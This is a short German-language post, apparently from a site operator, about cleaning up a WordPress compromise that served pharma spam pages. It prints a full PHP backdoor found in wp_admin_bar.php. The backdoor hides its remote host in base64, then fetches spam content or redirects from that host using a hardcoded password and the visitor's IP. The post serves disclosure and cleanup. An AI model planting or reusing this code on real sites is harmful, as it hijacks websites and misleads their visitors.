Wir sind guter Dinge, das die Hacker nun von uns ablassen..
Wir vermuten auch sämtliche Scripte entfernt zu haben…
Geschrieben in einer unverschlüsselten Version, aber irgendwie Direkt in die Original Dateien injeziert..
Es gibt einige Betroffene Seiten wie:
http://djk-sportbund-stuttgart.de/
Nach Suche von „/xanax-without-prescription-from-mexico“ auf Google.de
Hier ein Script aus der wp_admin_bar.php
$serial="aHR0cDovL3d3dy51cmxmaWxlbGlzdC5jb20vbW90aGVyLzE4";function ids_add_slash($path){$path=rtrim($path,'/').'/';return $path;}function ids_read_url($url){$ch=curl_init();$timeout=15;curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);curl_setopt($ch,CURLOPT_TIMEOUT,$timeout);$data=curl_exec($ch);if($data===false){$err=curl_error($ch);echo "";}curl_close($ch);return $data;}function ids_get_mother_file($mother_site,$filename,$bypassip=false){if(!$filename)return "";$ip=($bypassip?"skip":$_SERVER['REMOTE_ADDR']);$domain=$_SERVER['HTTP_HOST'];$url=ids_add_slash($mother_site)."readf.php"."?password=systemseo&filename=".$filename."&ip=".$ip."&domain=".$domain;$content=ids_read_url($url);return $content;}function ids_redirect($url){header("Location: $url");die();}function ids_main(){global $serial;$mode=isset($_GET['it_mode'])?$_GET['it_mode']:"";$mother_site=trim(base64_decode($serial));$uri=$_SERVER['REQUEST_URI'];if(substr($uri,-1)=="/"){$content="";}else {$a=explode("?",basename($uri));$requested_filename=$a[0].".html";$bypassip=(count($a)==2&&$a[1]=="bypassip");$content=ids_get_mother_file($mother_site,$requested_filename,$bypassip);}if($content){if(substr($content,0,12)=="!!REDIRECT!!"){$b=explode("!!",$content);$url=$b[2];ids_redirect($url);}else {echo $content;}die();}if($mode=="html"){header("HTTP/1.0 404 Not Found");echo "404 Not Found";die();}}ids_main();